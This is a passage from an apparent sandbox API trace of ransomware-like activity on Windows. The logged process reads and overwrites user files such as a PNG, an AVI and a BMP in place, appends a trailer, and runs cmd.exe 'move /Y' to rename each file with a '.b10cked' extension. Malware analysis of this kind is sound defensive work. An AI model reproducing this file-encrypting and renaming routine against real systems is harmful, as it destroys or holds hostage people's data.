hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 
[0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2a51 [0228.325] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2f39 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2f39 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.327] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.327] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x179b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x179b, lpOverlapped=0x0) returned 1 [0228.328] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.328] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x179b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x179b, lpOverlapped=0x0) returned 1 [0228.328] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-6043, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x179e [0228.328] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x179b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x179b, lpOverlapped=0x0) returned 1 [0228.328] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-6043, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x179e [0228.328] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x179b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x179b, lpOverlapped=0x0) returned 1 [0228.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LUKOkovEeIsTMf0.png", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0228.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LUKOkovEeIsTMf0.png", cchWideChar=19, lpMultiByteStr=0x1328794, cbMultiByte=19, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LUKOkovEeIsTMf0.png", lpUsedDefaultChar=0x0) returned 19 [0228.333] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2f39 [0228.333] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.334] CloseHandle (hObject=0x1b4) returned 1 [0228.335] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG") returned 0x33 [0228.335] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0228.335] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, 
hThread=0x1b4, dwProcessId=0x8cc, dwThreadId=0x9c8)) returned 1 [0228.473] CloseHandle (hObject=0x120) returned 1 [0228.473] CloseHandle (hObject=0x1b4) returned 1 [0228.473] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.473] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.473] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 2 [0228.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.473] ReleaseMutex (hMutex=0xf8) returned 1 [0228.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.473] ReleaseMutex (hMutex=0xf8) returned 1 [0228.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.473] ReleaseMutex (hMutex=0xf8) returned 1 [0228.474] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.474] ReleaseMutex (hMutex=0xf8) returned 1 [0228.474] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rceqmjhd9gnfz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.474] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.474] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28526332393) returned 1 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xdc6e [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xdc6e [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xd786 [0228.476] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.477] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.477] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xdc6e [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xdc6e [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.478] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6e36, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6e36, lpOverlapped=0x0) returned 1 [0228.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.479] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x6e36, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x6e36, lpOverlapped=0x0) returned 1 [0228.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-28214, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6e38 [0228.479] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6e36, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6e36, lpOverlapped=0x0) returned 1 [0228.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-28214, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6e38 
[0228.479] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x6e36, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x6e36, lpOverlapped=0x0) returned 1 [0228.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OXP9rCEqmjhd9gNfz.avi", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0228.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OXP9rCEqmjhd9gNfz.avi", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OXP9rCEqmjhd9gNfz.avi", lpUsedDefaultChar=0x0) returned 21 [0228.485] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xdc6e [0228.485] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.485] CloseHandle (hObject=0x1b4) returned 1 [0228.486] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI") returned 0x33 [0228.486] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0228.486] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked\"", lpProcessAttributes=0x0, 
lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xc4, dwThreadId=0x7b8)) returned 1 [0228.488] CloseHandle (hObject=0x120) returned 1 [0228.488] CloseHandle (hObject=0x1b4) returned 1 [0228.488] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.488] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.488] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 2 [0228.488] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.488] ReleaseMutex (hMutex=0xf8) returned 1 [0228.489] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.489] ReleaseMutex (hMutex=0xf8) returned 1 [0228.489] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.489] ReleaseMutex (hMutex=0xf8) returned 1 [0228.489] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.489] ReleaseMutex (hMutex=0xf8) returned 1 [0228.489] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\q--qnz17d.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.489] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28527843157) returned 1 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 